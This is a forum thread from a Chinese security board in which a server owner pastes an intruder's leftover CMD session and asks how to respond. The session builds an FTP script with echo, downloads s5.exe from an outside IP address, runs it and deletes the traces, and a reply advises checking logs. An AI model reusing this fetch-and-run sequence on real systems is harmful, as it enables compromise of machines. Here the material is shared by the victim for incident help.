|
 | 作者: efeikiss [efeikiss]
 论坛用户 |
登录 |
| 服务器遭人入侵.火啊.大虾门帮忙看看啊! 早上服务器的CMD还开着. C:\WINNT\system32>echo Phantom 1>x C:\WINNT\system32>echo Phantom 1>>x C:\WINNT\system32>echo bin 1>>x C:\WINNT\system32>echo get s5.exe 1>>x C:\WINNT\system32>echo bye 1>>x C:\WINNT\system32>ftp.exe -i -s:x 211.152.14.112 Connected to 211.152.14.112. 220 你Y又来了!!! User (211.152.14.112:(none)): 331 Password required for Phantom 230 User successfully logged in. ftp> ftp> bin 200 Type set to I ftp> get s5.exe 200 Port command successful. 150 Opening BINARY mode data connection for file transfer. 226 Transfer complete ftp: 30457 bytes received in 0.33Seconds 92.86Kbytes/sec. ftp> bye 220 再来揍死你!!! C:\WINNT\system32>del x C:\WINNT\system32>START s5.exe C:\WINNT\system32>del 0.bat 找不到批处理文件。 C:\WINNT\system32> 看来这是Serv-U 漏洞被人入侵了.各位大虾帮我看看.怎样对付这个家伙啊.谢谢.非常感谢. |
| 地主 发表时间: 05-11-08 09:08 |
 | 回复: virgoshaka [virgoshaka]  论坛用户 |
登录 |
|
查日志,找IP~ |
| B1层 发表时间: 05-11-08 16:15 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 服务器遭人入侵.火啊.大虾门帮忙看看啊!